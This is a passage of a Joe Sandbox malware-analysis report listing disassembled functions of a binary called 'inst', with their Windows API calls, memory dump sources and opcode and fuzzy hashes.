                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionException@8RaiseThrow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3976011213-0
                                                                                                                                                                      • Opcode ID: b555ee60b92cfb922177f159310df76ce9f5f14adb26a723ab1cb57b2127d7e7
                                                                                                                                                                      • Instruction ID: 766bf6723721758a4346afdbd4c11102e522c8b57d78f0579df98bb0f3942c6c
                                                                                                                                                                      • Opcode Fuzzy Hash: b555ee60b92cfb922177f159310df76ce9f5f14adb26a723ab1cb57b2127d7e7
                                                                                                                                                                      • Instruction Fuzzy Hash: 5BE09271400219BACB22BE86C802AD9BB98AF24364F00842AF89C46150E7B0A6D4CB90
                                                                                                                                                                      Function 001991EB Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00199202
                                                                                                                                                                        • Part of subcall function 0017B9B4: __EH_prolog3.LIBCMT ref: 0017B9BB
                                                                                                                                                                        • Part of subcall function 001D5385: __EH_prolog3.LIBCMT ref: 001D538C
                                                                                                                                                                        • Part of subcall function 00198C9F: __EH_prolog3.LIBCMT ref: 00198CA6
                                                                                                                                                                        • Part of subcall function 00198C9F: InterlockedExchange.KERNEL32(?,00003001), ref: 00198E38
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3$CountExchangeInterlockedTick
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 364811452-0
                                                                                                                                                                      • Opcode ID: 156950e3a86234f53bb549a7c48a3c3e1ab88d778259648e78a188091be28aca
                                                                                                                                                                      • Instruction ID: 82d4cb874c4599534956158b43a0de78fd2c2ef111538b63032cc64ce791730b
                                                                                                                                                                      • Opcode Fuzzy Hash: 156950e3a86234f53bb549a7c48a3c3e1ab88d778259648e78a188091be28aca
                                                                                                                                                                      • Instruction Fuzzy Hash: 52E09231608381AFFF25AB68E81A2EE32E1AB75715F00882EB0D542181CFF44884C653
                                                                                                                                                                      Function 5F516CC7 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegSetValueExW.KERNEL32(?,00000000,00000000,00000004,?,00000004,?,5F4F5B99,proxytype,00000001,proxytype,?,FF4173A1), ref: 5F516CEB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                      • Opcode ID: b0248507d7b3e6a334dea42acf40a1609a98977fd6a485415d8993fd882bbb5d
                                                                                                                                                                      • Instruction ID: 22c1444b712ee471c79b3edb2a3666806e4f622372652667fe7a50d04638af94
                                                                                                                                                                      • Opcode Fuzzy Hash: b0248507d7b3e6a334dea42acf40a1609a98977fd6a485415d8993fd882bbb5d
                                                                                                                                                                      • Instruction Fuzzy Hash: A9E048B1350209BBEB049E64C805FD677A8D704754F00C539BB5ACB1C1D675F508CB50
                                                                                                                                                                      Function 0017898E Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(?,?,00000000,?,00000000), ref: 001789A8
                                                                                                                                                                        • Part of subcall function 001726C0: RegCloseKey.ADVAPI32 ref: 001726CC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseOpen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 47109696-0
                                                                                                                                                                      • Opcode ID: 2d6124d3f993cb99751705f1a556fba48e7918452a7ab83715e64cb9fd5a32d6
                                                                                                                                                                      • Instruction ID: 65d4d22c607fac5425316dec84ae3e234ed9201d5ca29899e55e1fe3ab835a71
                                                                                                                                                                      • Opcode Fuzzy Hash: 2d6124d3f993cb99751705f1a556fba48e7918452a7ab83715e64cb9fd5a32d6
                                                                                                                                                                      • Instruction Fuzzy Hash: 12E01272600208BBEF14AF40DC06BAE7BB9EB54314F108019FD01A6250EBB5AE109BA4
                                                                                                                                                                      Function 00195909 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?,?,00189E1B,?,?,?), ref: 00195914
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExistsFilePath
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1174141254-0
                                                                                                                                                                      • Opcode ID: d5f0796e8e73891812f4b40c015716dc75587fd851910f93be19da62ceb13626
                                                                                                                                                                      • Instruction ID: bd61313e393772b080d7a9177500fa0e0faf62fcb4d491921f922c0cda21dcac
                                                                                                                                                                      • Opcode Fuzzy Hash: d5f0796e8e73891812f4b40c015716dc75587fd851910f93be19da62ceb13626
                                                                                                                                                                      • Instruction Fuzzy Hash: 68E0C232121E21EAFF1267304C00AE735DA6F25364F018829E846F3011E724D901C7A4
                                                                                                                                                                      Function 5F4EAE3C Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • KiUserExceptionDispatcher.NTDLL(406D1388,00000000,00000004,00001000,5F568AA8,00000018,5F51E73E,00000000), ref: 5F4EAE6F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DispatcherExceptionUser
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 6842923-0
                                                                                                                                                                      • Opcode ID: 88db3489921f79d94cd42c75b8842fcb5ccffbb4bc5a1c8d03dcbd4b5a251eca
                                                                                                                                                                      • Instruction ID: f700546fca20e8199cafd81b4b0e10b442b5e71e99239dbbd0cf6f90a808ade1
                                                                                                                                                                      • Opcode Fuzzy Hash: 88db3489921f79d94cd42c75b8842fcb5ccffbb4bc5a1c8d03dcbd4b5a251eca
                                                                                                                                                                      • Instruction Fuzzy Hash: B0E0C9B1942208AFDB04DFE8C904ADE7BF0EF88321F114259E555E7280DB704A448F64
                                                                                                                                                                      Function 001D0460 Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 001D0426: SetupIterateCabinetW.SETUPAPI(00000000,00000000,001D0376,00000000), ref: 001D0454
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,00198D06,?,?,.dir,?), ref: 001D047E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CabinetDeleteFileIterateSetup
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3725390358-0
                                                                                                                                                                      • Opcode ID: 015bd074805097dd10a88f99f98f12cebf82db3745d03334a6e1bc741dbbf17d
                                                                                                                                                                      • Instruction ID: 057f7edd7ed2cd31776685d93bc2cf852de44bc28bb369bf7650ccd097a8faac
                                                                                                                                                                      • Opcode Fuzzy Hash: 015bd074805097dd10a88f99f98f12cebf82db3745d03334a6e1bc741dbbf17d
                                                                                                                                                                      • Instruction Fuzzy Hash: EAD05B35118211AFDB149B28F840D9777D8DF8D270711445EF8C0C7220D731DC808A40
                                                                                                                                                                      Function 5F53041E Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • HeapCreate.KERNEL32(00000000,00001000,00000000,?,5F52D8C5,00000001,?,?,?,5F52DA3E,?,?,?,5F56C420,0000000C,5F52DAF9), ref: 5F530433
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 10892065-0
                                                                                                                                                                      • Opcode ID: 7627103c48a9091dd7cf0cb89cfb87399ac65faacbe0d4bcf8fad98bb3ac9be3
                                                                                                                                                                      • Instruction ID: 92abfbcb2e35ddb71384507348673a0873ec44327a95fedd647b93457500346e
                                                                                                                                                                      • Opcode Fuzzy Hash: 7627103c48a9091dd7cf0cb89cfb87399ac65faacbe0d4bcf8fad98bb3ac9be3
                                                                                                                                                                      • Instruction Fuzzy Hash: 03D05E729503449EEB405E75A90C7623BDC93842B6F148439F90ECA180F674D560CA44
                                                                                                                                                                      Function 5F51FCC6 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • recvfrom.WS2_32(?,?,?,?,?,?), ref: 5F51FCF4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: recvfrom
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 846543921-0
                                                                                                                                                                      • Opcode ID: 6b7632e5027b1c069598bf5442da1c260409874e745acd4887da170ee0512e77
                                                                                                                                                                      • Instruction ID: d89a1430336bafb6f0b90f62fcc36e0874d9c6f9c272b360bd63c152f8b3f27e
                                                                                                                                                                      • Opcode Fuzzy Hash: 6b7632e5027b1c069598bf5442da1c260409874e745acd4887da170ee0512e77
                                                                                                                                                                      • Instruction Fuzzy Hash: 50E04E76004109FFCF029F94D945DD97FA6FB18365B508058FA194A132C732D9B2EB90
                                                                                                                                                                      Function 5F5204A4 Relevance: 1.5, APIs: 1, Instructions: 19networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WSAAsyncSelect.WS2_32(?,00000000,?,?), ref: 5F5204C4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AsyncSelect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3214710386-0
                                                                                                                                                                      • Opcode ID: 454d8cb6b76ee43a245a6b57bbef09d03a935fe46e4097ac96ffaf6d961dba5a
                                                                                                                                                                      • Instruction ID: 8dc703b69fc2b13d1f768bad85ac90b29e9cab9165fa33205b6d5c57bcb7c16b
                                                                                                                                                                      • Opcode Fuzzy Hash: 454d8cb6b76ee43a245a6b57bbef09d03a935fe46e4097ac96ffaf6d961dba5a
                                                                                                                                                                      • Instruction Fuzzy Hash: 16E017F1556200ABD7409B38C949E2677E8EB4931EF24CA78B54AEB183D336D853CB94
                                                                                                                                                                      Function 0016E4F0 Relevance: 1.5, APIs: 1, Instructions: 18libraryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryW.KERNEL32(?,?,00000000,00000000,00000000), ref: 0016E50C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                                      • Opcode ID: 56e0d86ee5eb9ea108f65c51d2dd8f2af59e4138d49db351c4e12de953bbc4ea
                                                                                                                                                                      • Instruction ID: a798b0778290a23e749c304b6118a347b9ebec90f0fc276945fe6b09d9f39b4a
                                                                                                                                                                      • Opcode Fuzzy Hash: 56e0d86ee5eb9ea108f65c51d2dd8f2af59e4138d49db351c4e12de953bbc4ea
                                                                                                                                                                      • Instruction Fuzzy Hash: 68D0127734222075E52566546C0EFDB978C9F75776F30C527FB02E60C0ABB0653186AD
                                                                                                                                                                      Function 001A6817 Relevance: 1.5, APIs: 1, Instructions: 18networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • InternetGetConnectedState.WININET(?,00000000), ref: 001A6821
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConnectedInternetState
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 97057780-0
                                                                                                                                                                      • Opcode ID: b67663fb0afbd4fc64de11b6e1057477d650e1223503e60bdabb8f4fba47df80
                                                                                                                                                                      • Instruction ID: e326f13eac53f517a061c49835ad4ddaa3bcd8cde4ce44fed2f126be3cc94a0e
                                                                                                                                                                      • Opcode Fuzzy Hash: b67663fb0afbd4fc64de11b6e1057477d650e1223503e60bdabb8f4fba47df80
                                                                                                                                                                      • Instruction Fuzzy Hash: BCD01315A1434875DF11D7F5DD0EB5F76DC4F5274CF4C04645901D10D1EFA8D944D251
                                                                                                                                                                      Function 001C895E Relevance: 1.5, APIs: 1, Instructions: 18networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • InternetGetConnectedState.WININET(0017BB49,00000000), ref: 001C8968
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConnectedInternetState
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 97057780-0
                                                                                                                                                                      • Opcode ID: b67663fb0afbd4fc64de11b6e1057477d650e1223503e60bdabb8f4fba47df80
                                                                                                                                                                      • Instruction ID: 6e1e08a250673144832b3aceac16735746493a16e07bd86c28e48da67a4a39d6
                                                                                                                                                                      • Opcode Fuzzy Hash: b67663fb0afbd4fc64de11b6e1057477d650e1223503e60bdabb8f4fba47df80
                                                                                                                                                                      • Instruction Fuzzy Hash: 7DD0C711A1424875EB01A761DD8EF6A76DC4B6164DF44446C9912E10E1EFB4D940D2A1
                                                                                                                                                                      Function 001BCF63 Relevance: 1.5, APIs: 1, Instructions: 17COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f1b29131ba2ca7d692c444c510cc39fef2597e1c224ecb286fbcf2155fc834ca
                                                                                                                                                                      • Instruction ID: 8c78b1689ac76757174c442eade4fc89e7f07883d59b4696042d400a5494dc96
                                                                                                                                                                      • Opcode Fuzzy Hash: f1b29131ba2ca7d692c444c510cc39fef2597e1c224ecb286fbcf2155fc834ca
                                                                                                                                                                      • Instruction Fuzzy Hash: 2AD05EB15042109EDB104F64FC087D2739AFB51305F5144BDF840C6000E3325C829680
                                                                                                                                                                      Function 001AB42A Relevance: 1.5, APIs: 1, Instructions: 15windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
